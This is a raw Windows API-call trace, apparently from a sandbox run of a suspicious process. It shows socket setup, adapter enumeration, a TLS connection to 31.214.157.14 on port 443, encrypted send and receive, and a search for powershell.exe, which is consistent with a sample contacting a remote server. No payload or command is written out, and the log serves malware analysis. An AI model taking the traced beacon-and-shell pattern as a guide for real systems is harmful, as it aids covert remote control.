	[0120.348] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4dc
	[0120.348] ioctlsocket (in: s=0x4e4, cmd=-2147195266, argp=0x1c60d918 | out: argp=0x1c60d918) returned 0
	[0120.348] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4ec
	[0120.348] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4f0
	[0120.348] ioctlsocket (in: s=0x4ec, cmd=-2147195266, argp=0x1c60d918 | out: argp=0x1c60d918) returned 0
	[0120.348] WSAIoctl (in: s=0x4e4, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c60d890, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c60d890, lpOverlapped=0x0) returned -1
	[0120.348] CoTaskMemAlloc (cb=0x204) returned 0x22c440
	[0120.348] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x22c440, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0120.348] CoTaskMemFree (pv=0x22c440) 
	[0120.348] WSAEventSelect (s=0x4e4, hEventObject=0x4dc, lNetworkEvents=512) returned 0
	[0120.348] WSAIoctl (in: s=0x4ec, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c60d890, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c60d890, lpOverlapped=0x0) returned -1
	[0120.349] CoTaskMemAlloc (cb=0x204) returned 0x22c440
	[0120.349] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x22c440, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0120.349] CoTaskMemFree (pv=0x22c440) 
	[0120.349] WSAEventSelect (s=0x4ec, hEventObject=0x4f0, lNetworkEvents=512) returned 0
	[0120.460] GetAdaptersAddresses (in: Family=0x0, Flags=0x2e, Reserved=0x0, AdapterAddresses=0x0, SizePointer=0x1c60d3e8*=0x0 | out: AdapterAddresses=0x0, SizePointer=0x1c60d3e8*=0xbf0) returned 0x6f
	[0120.474] LocalAlloc (uFlags=0x0, uBytes=0xbf0) returned 0x1b362540
	[0120.474] GetAdaptersAddresses (in: Family=0x0, Flags=0x2e, Reserved=0x0, AdapterAddresses=0x1b362540, SizePointer=0x1c60d3e8*=0xbf0 | out: AdapterAddresses=0x1b362540*(Alignment=0xe000001c0, Length=0x1c0, IfIndex=0xe, Next=0x1b362870, AdapterName="{208C2C2F-ECA0-4B34-8C2D-83B1FBC25E0D}", FirstUnicastAddress=0x1b3627c0, FirstAnycastAddress=0x0, FirstMulticastAddress=0x0, FirstDnsServerAddress=0x0, DnsSuffix="", Description="Intel(R) PRO/1000 MT Network Connection #2", FriendlyName="Local Area Connection 2", PhysicalAddress=([0]=0x0, [1]=0x1c, [2]=0x34, [3]=0xa2, [4]=0x42, [5]=0x2b, [6]=0x0, [7]=0x0), PhysicalAddressLength=0x6, Flags=0x3e5, DdnsEnabled=0x3e5, RegisterAdapterSuffix=0x3e5, Dhcpv4Enabled=0x3e5, ReceiveOnly=0x3e5, NoMulticast=0x3e5, Ipv6OtherStatefulConfig=0x3e5, NetbiosOverTcpipEnabled=0x3e5, Ipv4Enabled=0x3e5, Ipv6Enabled=0x3e5, Ipv6ManagedAddressConfigurationSupported=0x3e5, Mtu=0x5dc, IfType=0x6, OperStatus=0x1, Ipv6IfIndex=0xe, ZoneIndices=([0]=0xe, [1]=0xe, [2]=0xe, [3]=0xe, [4]=0x1, [5]=0x1, [6]=0x1, [7]=0x1, [8]=0x1, [9]=0x1, [10]=0x1, [11]=0x1, [12]=0x1, [13]=0x1, [14]=0x0, [15]=0x1), FirstPrefix=0x0, TransmitLinkSpeed=0x3b9aca00, ReceiveLinkSpeed=0x3b9aca00, FirstWinsServerAddress=0x0, FirstGatewayAddress=0x0, Ipv4Metric=0xa, Ipv6Metric=0xa, Luid=0x6000007000000, Dhcpv4Server.lpSockaddr=0x1b362700*(sa_family=2, sin_port=0x0, sin_addr="192.168.0.1"), Dhcpv4Server.iSockaddrLength=16, CompartmentId=0x1, NetworkGuid=0x11de7039846ee341, ConnectionType=0x1, TunnelType=0x0, Dhcpv6Server.lpSockaddr=0x0, Dhcpv6Server.iSockaddrLength=0, Dhcpv6ClientDuid=([0]=0x0, [1]=0x1, [2]=0x0, [3]=0x1, [4]=0x20, [5]=0xc7, [6]=0x5c, [7]=0xa7, [8]=0xc4, [9]=0x3d, [10]=0xc7, [11]=0x58, [12]=0x4a, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0), Dhcpv6ClientDuidLength=0xe, Dhcpv6Iaid=0x11c43dc7, FirstDnsSuffix=0x0), SizePointer=0x1c60d3e8*=0xbf0) returned 0x0
	[0120.502] LocalFree (hMem=0x1b362540) returned 0x0
	[0120.505] WSAConnect (in: s=0x4d4, name=0x2eee0f0*(sa_family=2, sin_port=0x1bb, sin_addr="31.214.157.14"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0120.536] closesocket (s=0x4d0) returned 0
	[0121.213] EnumerateSecurityPackagesW (in: pcPackages=0x1c60d778, ppPackageInfo=0x1c60d770 | out: pcPackages=0x1c60d778, ppPackageInfo=0x1c60d770) returned 0x0
	[0121.262] lstrlenW (lpString="Negotiate") returned 9
	[0121.262] CoTaskMemAlloc (cb=0x16) returned 0x1f7bd0
	[0121.263] RtlMoveMemory (in: Destination=0x1f7bd0, Source=0x1fdee0, Length=0x14 | out: Destination=0x1f7bd0) 
	[0121.263] CoTaskMemFree (pv=0x1f7bd0) 
	[0121.263] lstrlenW (lpString="Microsoft Package Negotiator") returned 28
	[0121.263] CoTaskMemAlloc (cb=0x3c) returned 0x1b34f970
	[0121.263] RtlMoveMemory (in: Destination=0x1b34f970, Source=0x1fdef4, Length=0x3a | out: Destination=0x1b34f970) 
	[0121.263] CoTaskMemFree (pv=0x1b34f970) 
	[0121.263] lstrlenW (lpString="NegoExtender") returned 12
	[0121.263] CoTaskMemAlloc (cb=0x1c) returned 0x20f930
	[0121.263] RtlMoveMemory (in: Destination=0x20f930, Source=0x1fdf2e, Length=0x1a | out: Destination=0x20f930) 
	[0121.263] CoTaskMemFree (pv=0x20f930) 
	[0121.263] lstrlenW (lpString="NegoExtender Security Package") returned 29
	[0121.263] CoTaskMemAlloc (cb=0x3e) returned 0x1b34f970
	[0121.263] RtlMoveMemory (in: Destination=0x1b34f970, Source=0x1fdf48, Length=0x3c | out: Destination=0x1b34f970) 
	[0121.263] CoTaskMemFree (pv=0x1b34f970) 
	[0121.263] lstrlenW (lpString="Kerberos") returned 8
	[0121.263] CoTaskMemAlloc (cb=0x14) returned 0x1f7bd0
	[0121.263] RtlMoveMemory (in: Destination=0x1f7bd0, Source=0x1fdf84, Length=0x12 | out: Destination=0x1f7bd0) 
	[0121.263] CoTaskMemFree (pv=0x1f7bd0) 
	[0121.263] lstrlenW (lpString="Microsoft Kerberos V1.0") returned 23
	[0121.263] CoTaskMemAlloc (cb=0x32) returned 0x218490
	[0121.263] RtlMoveMemory (in: Destination=0x218490, Source=0x1fdf96, Length=0x30 | out: Destination=0x218490) 
	[0121.263] CoTaskMemFree (pv=0x218490) 
	[0121.263] lstrlenW (lpString="NTLM") returned 4
	[0121.263] CoTaskMemAlloc (cb=0xc) returned 0x1f7bd0
	[0121.263] RtlMoveMemory (in: Destination=0x1f7bd0, Source=0x1fdfc6, Length=0xa | out: Destination=0x1f7bd0) 
	[0121.263] CoTaskMemFree (pv=0x1f7bd0) 
	[0121.264] lstrlenW (lpString="NTLM Security Package") returned 21
	[0121.264] CoTaskMemAlloc (cb=0x2e) returned 0x218490
	[0121.264] RtlMoveMemory (in: Destination=0x218490, Source=0x1fdfd0, Length=0x2c | out: Destination=0x218490) 
	[0121.264] CoTaskMemFree (pv=0x218490) 
	[0121.264] lstrlenW (lpString="Schannel") returned 8
	[0121.264] CoTaskMemAlloc (cb=0x14) returned 0x1f7bd0
	[0121.264] RtlMoveMemory (in: Destination=0x1f7bd0, Source=0x1fdffc, Length=0x12 | out: Destination=0x1f7bd0) 
	[0121.264] CoTaskMemFree (pv=0x1f7bd0) 
	[0121.264] lstrlenW (lpString="Schannel Security Package") returned 25
	[0121.264] CoTaskMemAlloc (cb=0x36) returned 0x218490
	[0121.264] RtlMoveMemory (in: Destination=0x218490, Source=0x1fe00e, Length=0x34 | out: Destination=0x218490) 
	[0121.264] CoTaskMemFree (pv=0x218490) 
	[0121.264] lstrlenW (lpString="Microsoft Unified Security Protocol Provider") returned 44
	[0121.264] CoTaskMemAlloc (cb=0x5c) returned 0x1b3414d0
	[0121.264] RtlMoveMemory (in: Destination=0x1b3414d0, Source=0x1fe042, Length=0x5a | out: Destination=0x1b3414d0) 
	[0121.264] CoTaskMemFree (pv=0x1b3414d0) 
	[0121.264] lstrlenW (lpString="Schannel Security Package") returned 25
	[0121.264] CoTaskMemAlloc (cb=0x36) returned 0x218490
	[0121.264] RtlMoveMemory (in: Destination=0x218490, Source=0x1fe09c, Length=0x34 | out: Destination=0x218490) 
	[0121.264] CoTaskMemFree (pv=0x218490) 
	[0121.264] lstrlenW (lpString="WDigest") returned 7
	[0121.264] CoTaskMemAlloc (cb=0x12) returned 0x1f7bd0
	[0121.264] RtlMoveMemory (in: Destination=0x1f7bd0, Source=0x1fe0d0, Length=0x10 | out: Destination=0x1f7bd0) 
	[0121.264] CoTaskMemFree (pv=0x1f7bd0) 
	[0121.264] lstrlenW (lpString="Digest Authentication for Windows") returned 33
	[0121.264] CoTaskMemAlloc (cb=0x46) returned 0x1b34f970
	[0121.264] RtlMoveMemory (in: Destination=0x1b34f970, Source=0x1fe0e0, Length=0x44 | out: Destination=0x1b34f970) 
	[0121.264] CoTaskMemFree (pv=0x1b34f970) 
	[0121.264] lstrlenW (lpString="TSSSP") returned 5
	[0121.264] CoTaskMemAlloc (cb=0xe) returned 0x1f7bd0
	[0121.264] RtlMoveMemory (in: Destination=0x1f7bd0, Source=0x1fe124, Length=0xc | out: Destination=0x1f7bd0) 
	[0121.265] CoTaskMemFree (pv=0x1f7bd0) 
	[0121.265] lstrlenW (lpString="TS Service Security Package") returned 27
	[0121.265] CoTaskMemAlloc (cb=0x3a) returned 0x1b34f970
	[0121.265] RtlMoveMemory (in: Destination=0x1b34f970, Source=0x1fe130, Length=0x38 | out: Destination=0x1b34f970) 
	[0121.265] CoTaskMemFree (pv=0x1b34f970) 
	[0121.265] lstrlenW (lpString="pku2u") returned 5
	[0121.265] CoTaskMemAlloc (cb=0xe) returned 0x1f7bd0
	[0121.265] RtlMoveMemory (in: Destination=0x1f7bd0, Source=0x1fe168, Length=0xc | out: Destination=0x1f7bd0) 
	[0121.265] CoTaskMemFree (pv=0x1f7bd0) 
	[0121.265] lstrlenW (lpString="PKU2U Security Package") returned 22
	[0121.265] CoTaskMemAlloc (cb=0x30) returned 0x218490
	[0121.265] RtlMoveMemory (in: Destination=0x218490, Source=0x1fe174, Length=0x2e | out: Destination=0x218490) 
	[0121.265] CoTaskMemFree (pv=0x218490) 
	[0121.265] lstrlenW (lpString="CREDSSP") returned 7
	[0121.265] CoTaskMemAlloc (cb=0x12) returned 0x1f7bd0
	[0121.265] RtlMoveMemory (in: Destination=0x1f7bd0, Source=0x1fe1a2, Length=0x10 | out: Destination=0x1f7bd0) 
	[0121.265] CoTaskMemFree (pv=0x1f7bd0) 
	[0121.265] lstrlenW (lpString="Microsoft CredSSP Security Provider") returned 35
	[0121.265] CoTaskMemAlloc (cb=0x4a) returned 0x1f4050
	[0121.265] RtlMoveMemory (in: Destination=0x1f4050, Source=0x1fe1b2, Length=0x48 | out: Destination=0x1f4050) 
	[0121.265] CoTaskMemFree (pv=0x1f4050) 
	[0121.265] FreeContextBuffer (in: pvContextBuffer=0x1fdda0 | out: pvContextBuffer=0x1fdda0) returned 0x0
	[0121.267] GetCurrentProcess () returned 0xffffffffffffffff
	[0121.267] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c60d258 | out: TokenHandle=0x1c60d258*=0x1c8) returned 1
	[0121.270] AcquireCredentialsHandleW (in: pPrincipal=0x0, pPackage=0x2ef22d0, fCredentialUse=0x2, pvLogonId=0x0, pAuthData=0x1c60d168, pGetKeyFn=0x0, pvGetKeyArgument=0x0, phCredential=0x1c60d158, ptsExpiry=0x1c60d150 | out: phCredential=0x1c60d158, ptsExpiry=0x1c60d150) returned 0x0
	[0121.276] InitializeSecurityContextW (in: phCredential=0x1c60d360, phContext=0x0, pTargetName=0x2ec95d8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x1c60d350, pOutput=0x2ef4a18, pfContextAttr=0x1c60d348, ptsExpiry=0x1c60d340 | out: phNewContext=0x1c60d350, pOutput=0x2ef4a18, pfContextAttr=0x1c60d348, ptsExpiry=0x1c60d340) returned 0x90312
	[0121.276] FreeContextBuffer (in: pvContextBuffer=0x1b3447a0 | out: pvContextBuffer=0x1b3447a0) returned 0x0
	[0121.331] send (s=0x4d4, buf=0x2ef4ae8*, len=115, flags=0) returned 115
	[0121.333] recv (in: s=0x4d4, buf=0x2ef4ae8, len=5, flags=0 | out: buf=0x2ef4ae8*) returned 5
	[0121.360] recv (in: s=0x4d4, buf=0x2ef4aed, len=93, flags=0 | out: buf=0x2ef4aed*) returned 93
	[0121.361] InitializeSecurityContextW (in: phCredential=0x1c60d280, phContext=0x1c60d530, pTargetName=0x2ec95d8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ef4df8, Reserved2=0x0, phNewContext=0x1c60d270, pOutput=0x2ef4e18, pfContextAttr=0x1c60d268, ptsExpiry=0x1c60d260 | out: phNewContext=0x1c60d270, pOutput=0x2ef4e18, pfContextAttr=0x1c60d268, ptsExpiry=0x1c60d260) returned 0x90312
	[0121.361] recv (in: s=0x4d4, buf=0x2ef4f08, len=5, flags=0 | out: buf=0x2ef4f08*) returned 5
	[0121.362] recv (in: s=0x4d4, buf=0x2ef4f2d, len=2549, flags=0 | out: buf=0x2ef4f2d*) returned 2549
	[0121.362] InitializeSecurityContextW (in: phCredential=0x1c60d1b0, phContext=0x1c60d460, pTargetName=0x2ec95d8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ef59f8, Reserved2=0x0, phNewContext=0x1c60d1a0, pOutput=0x2ef5a18, pfContextAttr=0x1c60d198, ptsExpiry=0x1c60d190 | out: phNewContext=0x1c60d1a0, pOutput=0x2ef5a18, pfContextAttr=0x1c60d198, ptsExpiry=0x1c60d190) returned 0x90312
	[0121.371] recv (in: s=0x4d4, buf=0x2ef5b08, len=5, flags=0 | out: buf=0x2ef5b08*) returned 5
	[0121.371] recv (in: s=0x4d4, buf=0x2ef5b2d, len=331, flags=0 | out: buf=0x2ef5b2d*) returned 331
	[0121.371] InitializeSecurityContextW (in: phCredential=0x1c60d0e0, phContext=0x1c60d390, pTargetName=0x2ec95d8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ef5d48, Reserved2=0x0, phNewContext=0x1c60d0d0, pOutput=0x2ef5d68, pfContextAttr=0x1c60d0c8, ptsExpiry=0x1c60d0c0 | out: phNewContext=0x1c60d0d0, pOutput=0x2ef5d68, pfContextAttr=0x1c60d0c8, ptsExpiry=0x1c60d0c0) returned 0x90312
	[0121.372] recv (in: s=0x4d4, buf=0x2ef5e58, len=5, flags=0 | out: buf=0x2ef5e58*) returned 5
	[0121.372] recv (in: s=0x4d4, buf=0x2ef5e7d, len=4, flags=0 | out: buf=0x2ef5e7d*) returned 4
	[0121.372] InitializeSecurityContextW (in: phCredential=0x1c60d010, phContext=0x1c60d2c0, pTargetName=0x2ec95d8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ef5f58, Reserved2=0x0, phNewContext=0x1c60d000, pOutput=0x2ef5f78, pfContextAttr=0x1c60cff8, ptsExpiry=0x1c60cff0 | out: phNewContext=0x1c60d000, pOutput=0x2ef5f78, pfContextAttr=0x1c60cff8, ptsExpiry=0x1c60cff0) returned 0x90312
	[0121.378] FreeContextBuffer (in: pvContextBuffer=0x1b3420e0 | out: pvContextBuffer=0x1b3420e0) returned 0x0
	[0121.378] send (s=0x4d4, buf=0x2ef6048*, len=134, flags=0) returned 134
	[0121.379] recv (in: s=0x4d4, buf=0x2ef6048, len=5, flags=0 | out: buf=0x2ef6048*) returned 5
	[0121.410] recv (in: s=0x4d4, buf=0x2ef604d, len=1, flags=0 | out: buf=0x2ef604d*) returned 1
	[0121.410] InitializeSecurityContextW (in: phCredential=0x1c60cf40, phContext=0x1c60d1f0, pTargetName=0x2ec95d8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ef61c0, Reserved2=0x0, phNewContext=0x1c60cf30, pOutput=0x2ef61e0, pfContextAttr=0x1c60cf28, ptsExpiry=0x1c60cf20 | out: phNewContext=0x1c60cf30, pOutput=0x2ef61e0, pfContextAttr=0x1c60cf28, ptsExpiry=0x1c60cf20) returned 0x90312
	[0121.427] recv (in: s=0x4d4, buf=0x2ef62d0, len=5, flags=0 | out: buf=0x2ef62d0*) returned 5
	[0121.428] recv (in: s=0x4d4, buf=0x2ef62f5, len=48, flags=0 | out: buf=0x2ef62f5*) returned 48
	[0121.428] InitializeSecurityContextW (in: phCredential=0x1c60ce70, phContext=0x1c60d120, pTargetName=0x2ec95d8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ef63f8, Reserved2=0x0, phNewContext=0x1c60ce60, pOutput=0x2ef6418, pfContextAttr=0x1c60ce58, ptsExpiry=0x1c60ce50 | out: phNewContext=0x1c60ce60, pOutput=0x2ef6418, pfContextAttr=0x1c60ce58, ptsExpiry=0x1c60ce50) returned 0x0
	[0121.454] QueryContextAttributesW (in: phContext=0x1c60d0d0, ulAttribute=0x4, pBuffer=0x2ef6530 | out: pBuffer=0x2ef6530) returned 0x0
	[0121.454] QueryContextAttributesW (in: phContext=0x1c60d0d0, ulAttribute=0x5a, pBuffer=0x2ef65b0 | out: pBuffer=0x2ef65b0) returned 0x0
	[0121.466] QueryContextAttributesW (in: phContext=0x1c60cf80, ulAttribute=0x53, pBuffer=0x2ef6900 | out: pBuffer=0x2ef6900) returned 0x0
	[0121.475] CertDuplicateCRLContext (pCrlContext=0x1b338310) returned 0x1b338310
	[0121.488] CertDuplicateStore (hCertStore=0x23ffe0) returned 0x23ffe0
	[0121.490] CertEnumCertificatesInStore (hCertStore=0x23ffe0, pPrevCertContext=0x0) returned 0x1b338390
	[0121.490] CertDuplicateCRLContext (pCrlContext=0x1b338390) returned 0x1b338390
	[0121.491] CertEnumCertificatesInStore (hCertStore=0x23ffe0, pPrevCertContext=0x1b338390) returned 0x1b338310
	[0121.491] CertDuplicateCRLContext (pCrlContext=0x1b338310) returned 0x1b338310
	[0121.491] CertEnumCertificatesInStore (hCertStore=0x23ffe0, pPrevCertContext=0x1b338310) returned 0x0
	[0121.491] CertCloseStore (hCertStore=0x23ffe0, dwFlags=0x0) returned 1
	[0121.491] CertFreeCRLContext (pCrlContext=0x1b338310) returned 1
	[0121.502] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x23ff10
	[0121.503] CertAddCRLLinkToStore (in: hCertStore=0x23ff10, pCrlContext=0x1b338390, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0121.619] CertAddCRLLinkToStore (in: hCertStore=0x23ff10, pCrlContext=0x1b338310, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0121.623] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x1b338310, pTime=0x1c60cf88, hAdditionalStore=0x23ff10, pChainPara=0x1c60cf90, dwFlags=0x0, pvReserved=0x0, ppChainContext=0x1c60cf80 | out: ppChainContext=0x1c60cf80) returned 1
	[0122.322] CertDuplicateCertificateChain (pChainContext=0x1cdc0340) returned 0x1cdc0340
	[0122.323] CertDuplicateCRLContext (pCrlContext=0x1b338310) returned 0x1b338310
	[0122.323] CertDuplicateCRLContext (pCrlContext=0x1ce15830) returned 0x1ce15830
	[0122.324] CertDuplicateCRLContext (pCrlContext=0x1ce158b0) returned 0x1ce158b0
	[0122.324] CertFreeCertificateChain (pChainContext=0x1cdc0340) 
	[0122.325] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x1cdc0340, pPolicyPara=0x1c60d108, pPolicyStatus=0x1c60d0e8 | out: pPolicyStatus=0x1c60d0e8) returned 1
	[0122.326] SetLastError (dwErrCode=0x0) 
	[0122.330] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x1cdc0340, pPolicyPara=0x1c60d1e0, pPolicyStatus=0x1c60d1c8 | out: pPolicyStatus=0x1c60d1c8) returned 1
	[0122.417] CertFreeCertificateChain (pChainContext=0x1cdc0340) 
	[0122.417] CertFreeCRLContext (pCrlContext=0x1b338310) returned 1
	[0122.570] EncryptMessage (in: phContext=0x1c60d790, fQOP=0x0, pMessage=0x2ef9028, MessageSeqNo=0x0 | out: pMessage=0x2ef9028) returned 0x0
	[0122.570] send (s=0x4d4, buf=0x2ef8d60*, len=117, flags=0) returned 117
	[0122.583] setsockopt (s=0x4d4, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0122.583] recv (in: s=0x4d4, buf=0x2ef9188, len=5, flags=0 | out: buf=0x2ef9188*) returned 5
	[0122.648] recv (in: s=0x4d4, buf=0x2ef91ad, len=2112, flags=0 | out: buf=0x2ef91ad*) returned 2112
	[0122.649] DecryptMessage (in: phContext=0x1c60d350, pMessage=0x2ef9b00, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2ef9b00, pfQOP=0x0) returned 0x0
	[0122.667] setsockopt (s=0x4d4, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0122.670] SetEvent (hEvent=0x3ac) returned 1
	[0122.740] VirtualQuery (in: lpAddress=0x1c60d4f0, lpBuffer=0x1c60e3b0, dwLength=0x30 | out: lpBuffer=0x1c60e3b0*(BaseAddress=0x1c60d000, AllocationBase=0x1bc80000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0122.744] CoTaskMemAlloc (cb=0x104) returned 0x28f6c0
	[0122.744] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x28f6c0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0122.744] CoTaskMemFree (pv=0x28f6c0) 
	[0122.746] CoTaskMemAlloc (cb=0x104) returned 0x28f6c0
	[0122.746] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x28f6c0, nSize=0x80 | out: lpBuffer="") returned 0x92
	[0122.746] CoTaskMemFree (pv=0x28f6c0) 
	[0122.746] CoTaskMemAlloc (cb=0x128) returned 0x1ce23190
	[0122.746] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x1ce23190, nSize=0x92 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x91
	[0122.746] CoTaskMemFree (pv=0x1ce23190) 
	[0122.748] CoTaskMemAlloc (cb=0x20e) returned 0x1b313760
	[0122.748] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1b313760 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0122.748] CoTaskMemFree (pv=0x1b313760) 
	[0122.750] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c60d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0122.750] SetErrorMode (uMode=0x1) returned 0x1
	[0122.753] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFindFileData=0x1c60d790 | out: lpFindFileData=0x1c60d790*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.773] SetErrorMode (uMode=0x1) returned 0x1
	[0122.775] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c60d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0122.775] SetErrorMode (uMode=0x1) returned 0x1
	[0122.775] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.ps1", lpFindFileData=0x1c60d790 | out: lpFindFileData=0x1c60d790*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.783] SetErrorMode (uMode=0x1) returned 0x1
	[0122.784] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c60d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0122.784] SetErrorMode (uMode=0x1) returned 0x1
	[0122.784] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.psm1", lpFindFileData=0x1c60d790 | out: lpFindFileData=0x1c60d790*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
